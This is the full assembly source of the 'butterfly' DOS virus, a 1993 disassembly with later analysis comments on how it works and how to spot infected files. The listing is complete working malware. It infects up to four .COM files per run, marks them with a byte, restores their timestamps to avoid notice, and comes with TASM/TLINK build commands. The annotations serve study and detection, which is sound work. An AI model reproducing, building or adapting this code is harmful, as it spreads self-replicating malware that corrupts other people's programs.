
comment|

************************************************************************
virus name: butterfly virus
effective length: 302 bytes
disassembled by silent death - 1993

notes:
- non-resident .com appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn from, but a lot of wasteful code

to compile: [byte matchup!]


tasm /m file.asm
tlink /t file.obj
************************************************************************|

;-----------------------------------------------------------------------
; Analysis annotation: DOS .COM appending infector, non-resident.
; Assembler: TASM, Intel syntax, 16-bit real mode, .model tiny, org 100h.
;
; Register roles while the find/infect loop runs:
;   bp   = delta offset (address the body was loaded at minus the address
;          it was assembled at); every data reference is [bp+label]
;   si   = pointer to the ASCIIZ filename field inside the virus's own DTA
;   bx   = DOS handle of the file currently open, 0 = nothing open
;   [sp] = pointer to fspec ("*.com"); pushed once, re-read by findfiles
;
; Observable indicators, all visible in this listing: the 01h marker at
; file offset 3, the 0ffh-delimited 'goddamn butterflies' string, the
; "*.com" search pattern, and a size growth of 4+12ah bytes with the
; original date/time stamp restored after writing (so mtime-based triage
; does not flag infected files; size and marker do).
;
; The constants 10bh (delta) and 12ah (body length) are tied to the exact
; byte layout of this listing - that is what the header's "byte matchup"
; note means. Any change in instruction encoding shifts them.
;-----------------------------------------------------------------------
.model tiny
.code
org 100h

start:
jmp virus ; first-generation sample: jump over the 4-byte record to the body
nop
nop

; Four contiguous bytes that infect: reads, rewrites and appends as a unit.
; First generation: int 20h / nop / 01h. In a host they are overwritten
; by the host's own first 4 bytes (the ah=3fh read in infect).
oldjmp db 0cdh ; int 20h

newjmp db 20h
db 90h ; nop
id db 1 ; infection marker: an infected file carries 01h at offset 3

virus:
call delta ; get delta offset: pushes the address of `delta`
delta:
pop bp
sub bp,10bh ; 10bh must equal the assembled offset of `delta`; bp = 0 in the
            ; original sample, = host size - 4 when running from a host

; Restore the host's first 4 bytes in memory at 100h so `retn` at
; returntohost lands on the original code.
mov di,100h ; move bytes to the start

lea si,[bp+oldjmp] ; original starting bytes (saved copy)
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes

; Point the DOS DTA at the virus's own 43-byte buffer so find-first/next
; results (and the filename at dta+1eh) are reachable via [bp+dta+...].
mov ah,1ah ; set dta

lea dx,[bp+dta] ; set into heap
int 21h

mov byte ptr [bp+offset counter],0 ; reset counter of infected files this run

mov ah,4eh ; find first asciiz file

lea si,[bp+dta+1eh] ; points to fname in dta (si stays live for the whole loop)
lea dx,[bp+fspec] ; files to find (*.com)
push dx ; save file spec; never popped - sp is reset before returning to host
jmp short findfiles

; Exit path: restore the PSP default DTA (80h), clear registers, reset sp,
; then "return" to 100h where the 4 original bytes were restored above.
; In the first-generation sample those bytes are int 20h, i.e. terminate.
returntohost:
mov ah,1ah ; set dta
mov dx,80h ; to original position
int 21h

xor ax,ax ; clear all registers

xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0fffeh ; adjust stack pointer (discards the pushed fspec pointer)
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host

; Per-file cleanup: restore the file's original date/time, close it,
; then continue with find-next. Reached with bx = 0 when open failed
; or when find-first/next itself failed to open anything.
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing

; Dead code: cx is fully overwritten by the `mov cx,...` below before use.
mov ch,0 ; get attributes

mov cl,[bp+dta+15h] ; theres no point!

; Restoring the stamp from the DTA entry hides the modification from
; date/time-based inspection.
mov ax,5701h ; set files date/time

mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h

mov ah,3eh ; close file

int 21h
xor bx,bx ; delete handle

findnext:
mov ah,4fh ; find next file

; Shared tail of find-first (ah=4eh, entered via jmp short above) and
; find-next (ah=4fh). dx = fspec pointer kept on top of stack.
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; attribute mask: read-only, hidden and system files are also matched
xor bx,bx ; make sure no handle
int 21h

jnc infect ; jump if file found

jmp returntohost2 ; no files found then quit

; Embedded text string, 0ffh-delimited: a simple signature for scanners.
vname db 0ffh
db 'goddamn butterflies' ; ya know!
db 0ffh

; Infect one candidate: open, read its first 4 bytes into the oldjmp
; record, apply the skip checks, append record + body, rewrite the head.
infect:
mov dx,si ; dx => fname in dta

mov ax,3d02h ; open file read/write

int 21h
jc closeup ; if error close up, get another (bx is still 0 here)
mov bx,ax ; handle to bx

; Overwrites oldjmp/newjmp/nop/id with the target's first 4 bytes, so the
; `cmp [bp+id],1` below inspects the target's byte at offset 3.
mov ah,3fh ; read from file

mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
int 21h

; dta+23h is filename byte 5: the word 444eh is 'N','D' little-endian,
; i.e. the "ND" of COMMAND.COM. Only these two characters are tested.
mov ax,word ptr [bp+dta+23h]; get end of filename

cmp ax,444eh ; is file command.com?
je closeup ; yup so leave it

cmp [bp+id],1 ; is file infected? (target's 4th byte == marker)

je closeup ; yup so leave it

; Only the low word of the DTA size field is read.
mov ax,word ptr [bp+dta+1ah]; get file size

cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it

; Seek to end; DOS returns the new position in dx:ax. Only ax (low word)
; is examined afterwards; dx is never checked.
mov ax,4202h ; file pointer to end

cwd
xor cx,cx
int 21h

cmp ax,64768 ; is file to big to infect (0fd00h; presumably leaves room in the 64K segment - not stated here)

ja closeup ; if above then jump

mov [bp+data],ax ; save file size (low word)

; Append: first the 4-byte record holding the host's original head bytes,
; then 12ah bytes of body starting at `virus`.
lea dx,[bp+oldjmp] ; buffer to write from

mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h

lea dx,[bp+virus] ; start of virus

mov cx,12ah ; write virus (298) to end - length tied to this exact byte layout
mov ah,40h ; write to file
int 21h

mov ax,4200h ; file pointer to start

cwd
xor cx,cx
int 21h

; Build the new 4-byte head in place: e9 <size+1 as word> 01.
; The word write covers newjmp and the following 90h byte.
mov ax,[bp+data] ; get the file size

inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0e9h ; new jump
mov [bp+id],1 ; infection marker

lea dx,[bp+oldjmp] ; new jump

mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h

inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file

; Dead compare: both the taken and the fall-through path reach
; returntohost3, so the word at 100h is never acted upon.
returntohost2: ; this is a total waste!

mov di,100h ; start of file
cmp word ptr [di],20cdh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost

fspec db '*.com',0 ; files to find

dta db 43 dup (0) ; holds dta (DOS find-first/next record; filename at +1eh)

counter db 0 ; holds file counter
data dw 0 ; holds new jump offset

end start
